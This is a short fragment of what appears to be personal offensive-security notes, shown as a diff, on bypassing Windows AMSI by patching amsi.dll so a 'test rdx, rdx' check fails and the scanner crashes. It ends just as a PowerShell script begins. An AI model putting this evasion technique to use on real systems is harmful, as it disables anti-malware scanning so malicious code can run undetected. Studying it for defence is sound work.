manununu/notes/09_Windows.md

 AMSI = Anti Malware Scan Interface

 We can bypass the amsi.dll by crashing it.
 The following powershell script can be used:
+Info: First a "test rdx, rdx" is performed.
+If we can replace it with "XOR rax, rax" AMSI will crash since the "zero flag" is set.

 ```
 function LookupFunc {